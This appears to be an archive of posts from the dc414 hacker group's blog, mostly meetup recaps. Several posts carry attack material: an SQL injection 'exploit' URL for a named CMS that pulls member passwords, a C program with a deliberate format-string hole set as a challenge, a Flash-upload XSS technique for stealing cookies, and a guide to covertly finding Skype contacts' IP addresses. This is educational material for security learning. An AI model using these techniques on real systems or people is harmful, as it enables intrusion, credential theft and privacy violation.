June meetup re-cap

We’re still very much alive and active, no one has bothered to update the website is all. ūüôā ¬† dw5304 got us off to a fun start with some Outernet¬†reception, although it was really a demofail. ¬†Still fun to set up a satellite and receive signals!

Klaiviel had an awesome 3d printed brute force machine in the works for combination locks.  Very fast!

We also did a nice sized LAN party on Saturday, lots of fun, booze, and yelling commenced.  Want to join in the fun? Feeling like you missed out? Are you on our mailing list? You should be!  or join us on IRC on freenode at #dc414.

-darkwind

March meeting fun!

March came in, and was an awesome time.  Too bad ngharo and vlad missed it.  We were hopping at the Meetupery!

IMG_20140307_193546

dw5304 got things started with some radio hacking, with his HackerRF board that he’s managed to un-brick. ¬† We swept some bands, and learned that car FOBs generally work around 300mhz for sending signals. ¬†And Chrysler FOBs have some good output! ¬†IMG_20140307_203527

After that, we had some fun with a giant lock that Klaviel tried his hand at.  This thing is used for some serious security!  IMG_20140307_203610

We also reminisced about previous dc414 meetings, like a certain laser incident, and RF jammers.   W also got to see a neat piece of hackery, an ammo can turned into a self contained power supply, with lithium drill batteries and an inverter.   Awesomesauce! IMG_20140307_213641

Thanks for everyone who came out, and we’ll see you again next month!

-darkwind

February meeting awesomeness and sadness

February was another great meeting. It started with me and ngharo running late then doing the introductions, which there was a lot of. Its always good to see new faces at meetings. Then I broke the sad news that I will be leaving Wisconsin and so dc414 as well, appointed ngharo as new prez and stepped down. Then ngharo said a few words and gave us a glimpse of some of the changes he will be making. Everyone be sure to congratulate ngharo, I can’t wait to see what he does with the place.

Rob started the demos off with hacking a used disposable flash camera and a halogen light bulb to make a handy improvised flash light. I perfect zombie apocalypse type hack. Then he busted out materials for everyone to make their own zombie caution light. It did’t take long for people to start hacking it up even more and did all kinds of crazy things. Vlad was the first to turn things up to 10 by doing something to the transformer in the camera to pump out more voltage and get a brighter light. Then dw5304 and others did their best to blow the capacitors and other things up! Then using the flash bulb that came with the camera and capacitors over 9000 we tried to do some UV tattooing. Next up was Klaiviel doing a key impressioning demo for the newbies in the crowd. Here are some photos of the meeting.

So here it is, my last post on dc414. It has been a fun ride and I will miss everyone. You can still find me on the dc414 irc chan and I will be at meetings via G+ or what ever ngharo sets up for the group. See you out there.

-AA

Format string $20 challenge

At the last meeting I showed everyone how to use a format string vulnerability in a password storage app to bypass the master password and pull data out of memory. That is just one way to exploit this type of vulnerability so I challanged everyone at the meeting to get the app I used “code below” to execute their supplied input. The first person to let me know they got it and do a demo get $20! So it pays to be a little early.

#include < stdio.h >
#include < string.h >

int main (int argc, char *argv[])
{
char** spw = "dc414 pwnz";
char text[1025];
strcpy(text, argv[1]);
if (strcmp(text, "asd123")==0) {
printf("Correct the password is %s \n",spw);
return 0;
}
printf(text);
printf(" is wrong\n");
return 0;
}

Telmanik CMS Press 1.01 SQLi 0day

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
http://site.org/themes/pages.php?page_name=[SQLi]

you have to formate you injection like so:
union_select_row_from_table
Replacing spaces with “_”.

Ex:
http://site.org/themes/pages.php?page_name=union_select_password_from_members

This is a special DefCon 21 kick off from me! See ya there ūüėČ

Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny

Tips for dc414 members (and everyone else) at DEFCON21

Here are a few tips and guidelines to follow while in Vegas:

  • Keep an eye on dc414’s twitter, Facebook, and G+ feeds to keep up to date on what we are doing so you can join in on the fun.
  • If you have access to dc414’s VPN be sure to use it at all times on your tablet, phone, and laptop. If you do not have access to the VPN but have a server you can access “like one on your home connection”, set up a ssh tunnel and use it at all times.
  • Do not use USB “or CDs/DVDs” sticks from anyone, other then ones you brought your self, including ones you find on the floor or parking lot.
  • Do not leave USB sticks laying out that you intend to use later.
  • Do not let anyone connect their phone to your system for charging or any other reason.
  • Do not connect your phone/tablet to anyones computer other then yours.
  • When using the local WIFI “hotel, convention center, etc” Do not visit any site you intend to login to with the HTTP protocol “ie http://mail.dc414.org” only connect using HTTPS “ie https://mail.dc414.org”
  • Do not scan any QR codes with apps that do not verify the content before displaying it or opening other programs.
  • Do not ever leave your computer, phone, or tablet unattended

July meeting recap

Let me start by saying many thanks to Milwaukee Makerspace for hosting our meeting and to Klaiviel for hooking us up. Ulic got us rolling and gave a awesome presentation on PRISM and other government spying programs. dw5304 was up next and did his cable modem magic for us. Then Klaiviel showed us how to crash RC planes and quad-copters. After words he gave us the grand tour of Makerspace. The rest of the night everyone socialized while vlad, darkwind, and Klaiviel crashed a quad-copter.

UPDATE:
You can get a copy of Ulic’s slides HERE enjoy ūüôā

Upload your own XSS

A few meetings ago i gave a demo on uploading a flash file to file hosting sites that contains a evil XSS payload. Here is my write up on it.

A while back I was doing a penetration test on a friends file hosting service application. His service allowed the uploading of flash files and when you viewed the files detail page it showed you a preview of the flash movie. At the time I knew you could use actionscript to put javascript in a flash file but I was not sure if it would have full access to the DOM and allow us to do evil stuff.

I started messing around in actionscript and came up with this:

After compiling it and uploading, when viewing the preview page I was greeted with a prompt box that had the contents of my cookie for that domain and it was displayed in text with in the flash embed! So, just like that we are able to manufacture a XSS vulnerability on a application that is otherwise secure.

There is some protection for this attack. When you embed a flash file in a web page that you don’t trust you should add the allowScriptAccess param and set it to none. However this can be bypassed easily, just go to the swf file itself and it will still execute the javascript supplied by our swf file. This means to be fully protected you will also need to use a modrewrite rule to force a download when ever someone tries to view a swf file directly.

Here is one example – http://www.ziddu.com/viewfile/22413513/xss.swf.html

Here is another – http://swfchan.org/2335/xss.swf

June Meeting Recap

Thanks to all that attended the June meeting. ¬†Lot’s of interesting discussion and demos as usual.

Some highlights were Klaiviel giving an in-depth look at the state of 3D printing with a focus on weapons and some of the issues surrounding it.

We later headed for the roof of Bucketworks to learn about DirectTV hardware installations and some of the tools the pros use.  We got to learn about different satellites  and had some really good discussions while the ISS zipped past brightly in the night sky.  Thanks Darkwind.

dw5304 took over next and showed off some 40Gb Ethernet gear along with a demo.  We also had fun exploiting some really awful security of a customer management portal that dw5304 stumbled upon.

edgewalker was one of the lucky contestants to win the Free Junk Giveaway.  Enjoy the LetterPerfect software on your IBM/DOS compatible PC! 

Some pictures courtesy of our beloved overlord, AnarchyAngel.

Getting IP addresses from contacts on Skype as told by Noize.

Skype is an extremely popular, proprietary, cross-platform, peer-to-peer Voice-over-IP software client written by Skype Communications SARL, which is now owned by Microsoft Corporation. Due to its peer-to-peer always-on nature it is possible for a researcher to determine characteristics about a target computer, without the user’s knowledge. This can be leveraged to obtain information like the IP address of a target computer.

This is an Educational Guide only; use knowledge at your own risk! and always “the quieter you become, the more you are able to hear”.

Prerequisites

  • Your IP address

Skype Setup

  1. Head into Tools -> Options -> Advanced -> Connection
  2. Uncheck the checkbox labeled: “Use port 80 and 443 as alternative for incoming connections.”
  3. Use port 1210 for incoming connections.  Located right about the checkbox from step 2
    The reason for using this port is because it’s a unassigned tcp/udp port so we will not be DoSing a port, or cause other issues.

Wireshark Setup

  1. Open wireshark and start watching your incoming and outgoing traffic.
    Sniff the interface you will be using Skype on
  2. Create a filter like this
    ip.src == $your_ip_address and udp.srcport == 1210

Capture IP

  1. Start a call to a person, online or offline
  2. Watch wireshark and it will start to give you outgoing and incoming connections
  3. Once you have an outgoing IP that is consistent to the incoming IP, you have found it.

Happy Hacking!

Many thanks to Noize for writing this up and allowing us to share it.